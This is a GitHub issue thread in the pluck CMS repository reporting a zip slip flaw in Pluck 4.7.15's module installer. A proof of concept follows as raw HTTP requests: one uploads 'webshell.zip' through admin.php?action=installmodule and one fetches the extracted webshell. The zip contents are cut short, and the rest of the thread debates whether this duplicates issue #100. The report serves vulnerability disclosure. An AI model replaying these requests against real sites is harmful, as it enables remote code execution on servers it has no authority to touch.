search

pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org
54 stars 37 forks source link

Pluck 4.7.15 - Zip Slip Vulnerability #105

Closed debug601 closed 2 years ago

debug601 commented 2 years ago

Issue Summary Pluck's module and installmodule are vulnerable to directory traversal (via zip slip) and arbitrary code execution. php version: php5.2.1 Detailed Description There is a problem in Pluuck 4.7.15. / data/inc/module_install.php allows remote malicious users to upload malicious zip files to traverse directories outside the expected environment, which may allow execution of arbitrary code that will run with the privileges of the user assigned to the Web server.

Vulnerability url: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule

Vulnerability POC:

POST /pluck4.7.15/admin.php?action=installmodule HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------26434200512599
Content-Length: 478

-----------------------------26434200512599
Content-Disposition: form-data; name="sendfile"; filename="webshell.zip"
Content-Type: application/x-zip-compressed

PK
-----------------------------26434200512599
Content-Disposition: form-data; name="submit"

Upload
-----------------------------26434200512599--

arbitrary code execution

GET /pluck4.7.15/data/modules/webshell/2.php HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close

Impact This vulnerability allows remote code execution and directory traversal under the privileges of the user running the Web server application.

BSteelooper commented 2 years ago

This is a duplicate of issue #100 which has been fixed in the latest dev version.

debug601 commented 2 years ago

This is a new way to use it.

BSteelooper commented 2 years ago

See if it still exists in the latest dev version. issue #100 is fixed in the latest version, which should make zip zip impossible.

debug601 commented 2 years ago

查看它是否仍存在于最新的开发版本中。问题#100在最新版本中已修复,这应该使zip无法进行。

I also tested it on Pulck4.7.16.dev1 and found this vulnerability. This means that pluck4.7.15 has not fixed this utilization method at all. This is fundamentally different from # 100. I believe this loophole exists in pluck4.7.15,pluck4.7.16.dev1-dev3 and all the versions you have released so far. I want to apply for cve for each version.

debug601 commented 2 years ago

100 is the use of the file "/ admin.php?action=themeinstall", #105 while mine is "admin.php?action=installmodule". These are two different ways of using it.

debug601 commented 2 years ago

See if it still exists in the latest dev version. issue #100 is fixed in the latest version, which should make zip zip impossible.

You shouldn't say that my use is repeated. He is real.